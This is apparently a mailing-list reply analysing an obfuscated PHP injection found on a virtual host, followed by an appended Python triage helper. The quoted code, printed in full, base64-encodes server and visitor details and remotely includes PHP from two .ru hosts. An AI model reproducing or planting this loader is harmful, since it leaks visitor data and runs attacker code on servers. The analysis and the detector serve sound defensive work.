Barbara M. wrote:
> <? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ?
> $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ?
> $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])
> ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])
> ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ?
> $_SERVER["QUERY_STRING"] :
> $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ?
> $_SERVER["HTTP_REFERER"] :
> $HTTP_REFERER);$g=(isset($_SERVER['HTTP_USER_AGENT']) ?
> $_SERVER['HTTP_USER_AGENT'] :
> $HTTP_USER_AGENT);$h=(isset($_SERVER['REMOTE_ADDR']) ?
> $_SERVER['REMOTE_ADDR'] :
> $REMOTE_ADDR);$str=base64_encode($a).'.'.base64_encode($b).'.'.base64_encode($c).'.'.base64_encode($d).'.'.base64_encode($e).'.'.base64_encode($f).'.'.base64_encode($g).'.'.base64_encode($h);
>
> if
> ((include(base64_decode('aHR0cDovLw==').base64_decode('dXNlcjkubXNodG1sLnJ1')."/?".$str))){}
>
> else
> {include(base64_decode('aHR0cDovLw==').base64_decode('dXNlcjcuaHRtbHRh
> Z3MucnU=')."/?".$str);} ?>

let's pick this apart...

first, it disables error reporting, then it sets some vars to various
predefined vars (from apache/php);

$a: HTTP_HOST (the virtualhost)
$b: SERVER_NAME (the "primary" hostname)
$c: REQUEST_URI (the uri requested (/foo/bar/baz.php/bleh?a=2))
$d: PHP_SELF (name of php file being executed)
$e: QUERY_STRING (part of url following '?')
$f: HTTP_REFERER (url that linked to the script)
$g: HTTP_USER_AGENT (you know this one, right? ;)
$h: REMOTE_ADDR (IP of client)

then, it base64encodes these values (ie. 62.101.244.10 becomes
NjIuMTAxLjI0NC4xMA==) into the variable $str

then it includes
http://user9.mshtml.ru/?<captured data>
or if that fails, it includes
http://user7.htmltags.ru/?<captured data>

at which point, the server would execute whatever php code one (or both)
of those servers would return, if http fopen wrappers are enabled for the
server (ie.: safemode is off)

> > Any idea on what this code is?
> The vhost owner tell isn't the author-

did that clarify?

Cheers,
--
Morten
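
A triage helper for the pattern picked apart in this thread, added here as an example and not part of the original posts: it decodes base64 literals chained inside `include`/`require` to reveal the hidden target, and unpacks the dot-separated string appended after `?`. The function names and the placeholder host `c2.example.invalid` are assumptions.

```python
import base64
import re

# base64_decode('...') with a literal argument (PHP function names are case-insensitive).
B64_CALL = re.compile(r"""base64_decode\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)""", re.I)
# include/require whose argument begins with one or more chained base64_decode calls.
INCLUDE = re.compile(
    r"""\b(?:include|require)(?:_once)?\s*\(?\s*"""
    r"""((?:base64_decode\(\s*['"][A-Za-z0-9+/=\s]+['"]\s*\)\s*\.?\s*)+)""", re.I)
# Field order of $str in the quoted code ($a .. $h).
FIELDS = ["HTTP_HOST", "SERVER_NAME", "REQUEST_URI", "PHP_SELF",
          "QUERY_STRING", "HTTP_REFERER", "HTTP_USER_AGENT", "REMOTE_ADDR"]

def decode_literal(lit):
    # Literals may be split by line wrapping; drop whitespace before decoding.
    return base64.b64decode("".join(lit.split())).decode("latin-1")

def hidden_include_targets(php_source):
    """Decoded prefix of every include/require assembled from base64 literals."""
    return ["".join(decode_literal(c.group(2)) for c in B64_CALL.finditer(m.group(1)))
            for m in INCLUDE.finditer(php_source)]

def is_remote(target):
    """True when the decoded include target is a URL rather than a local path."""
    return re.match(r"(?i)(https?|ftp)://", target) is not None

def decode_beacon(query):
    """Recover the server variables from the dot-separated base64 string after '?'."""
    return dict(zip(FIELDS, (decode_literal(f) for f in query.split("."))))

def b64(s):
    return base64.b64encode(s.encode()).decode()

# Constructed sample shaped like the quoted injection; the host is a placeholder.
SAMPLE = ("<? error_reporting(0); if ((include(base64_decode('%s')."
          "base64_decode('%s').\"/?\".$str))){} ?>"
          % (b64("http://"), b64("c2.example.invalid")))

if __name__ == "__main__":
    for t in hidden_include_targets(SAMPLE):
        print("REMOTE" if is_remote(t) else "local", t)
```

Run `hidden_include_targets` over each PHP file in a vhost's document root to list files carrying this kind of include; `decode_beacon` applies to the query string seen in outbound proxy or firewall logs.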